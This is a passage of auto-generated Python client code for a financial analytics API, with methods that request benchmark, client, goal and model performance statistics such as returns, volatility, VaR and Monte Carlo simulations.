Get information on the performance of a benchmark using TWR (Time Weighted Return). You must provide the unique benchmark_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_benchmark_performance_using_get(benchmark_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str benchmark_id: Benchmark Id - /benchmark (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str comparison_benchmark_id: comparison_benchmark_id
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: Stat type - /statistics endpoint
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_benchmark_performance_using_get_with_http_info(benchmark_id, **kwargs) # noqa: E501
else:
(data) = self.get_benchmark_performance_using_get_with_http_info(benchmark_id, **kwargs) # noqa: E501
return data
def get_benchmark_performance_using_get_with_http_info(self, benchmark_id, **kwargs): # noqa: E501
"""Benchmark Performance # noqa: E501
Get information on the performance of a benchmark using TWR (Time Weighted Return). You must provide the unique benchmark_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_benchmark_performance_using_get_with_http_info(benchmark_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str benchmark_id: Benchmark Id - /benchmark (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str comparison_benchmark_id: comparison_benchmark_id
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: Stat type - /statistics endpoint
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['benchmark_id', 'active_premium_period', 'annualized_return_period', 'comparison_benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_benchmark_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'benchmark_id' is set
if ('benchmark_id' not in params or
params['benchmark_id'] is None):
raise ValueError("Missing the required parameter `benchmark_id` when calling `get_benchmark_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'benchmark_id' in params:
path_params['benchmark_id'] = params['benchmark_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'comparison_benchmark_id' in params:
query_params.append(('comparison_benchmark_id', params['comparison_benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/benchmark/{benchmark_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_client_performance_using_get(self, client_id, **kwargs): # noqa: E501
"""Client Performance # noqa: E501
Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_performance_using_get(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client Id -/client (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type -- /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_performance_using_get_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_performance_using_get_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Client Performance # noqa: E501
Get information on the performance of a client using IRR (Internal Rate of Return). You must provide the unique client_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_performance_using_get_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client Id -/client (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type -- /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_client_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_client_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/client/{client_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_goal_performance_using_get(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param bool portfolio_goal: portfolio_goal
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_goal_performance_using_get_with_http_info(client_id, goal_id, **kwargs) # noqa: E501
else:
(data) = self.get_goal_performance_using_get_with_http_info(client_id, goal_id, **kwargs) # noqa: E501
return data
def get_goal_performance_using_get_with_http_info(self, client_id, goal_id, **kwargs): # noqa: E501
"""Goal Performance # noqa: E501
Get information on the performance of a goal using IRR (Internal Rate of Return). You must provide the unique goal_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_goal_performance_using_get_with_http_info(client_id, goal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str client_id: Client associated with the account - /client (required)
:param str goal_id: Goal Id - /account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param bool portfolio_goal: portfolio_goal
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id', 'goal_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'portfolio_goal', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_goal_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_goal_performance_using_get`") # noqa: E501
# verify the required parameter 'goal_id' is set
if ('goal_id' not in params or
params['goal_id'] is None):
raise ValueError("Missing the required parameter `goal_id` when calling `get_goal_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
if 'goal_id' in params:
path_params['goal_id'] = params['goal_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'portfolio_goal' in params:
query_params.append(('portfolio_goal', params['portfolio_goal'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/goal/{goal_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_performance_using_get(self, model_id, **kwargs): # noqa: E501
"""Model Performance # noqa: E501
Get information on the performance of a model using TWR (Time Weighted Return). You must provide the unique model_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_performance_using_get(model_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str model_id: Model Id - /model (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.entity. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo i.entity. 50- (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo i.entity. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: Stat Type
:param float var_conf_interval: VaR Confidence Interval ( alpha ) i.entity 99, 95, etc - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_model_performance_using_get_with_http_info(model_id, **kwargs) # noqa: E501
else:
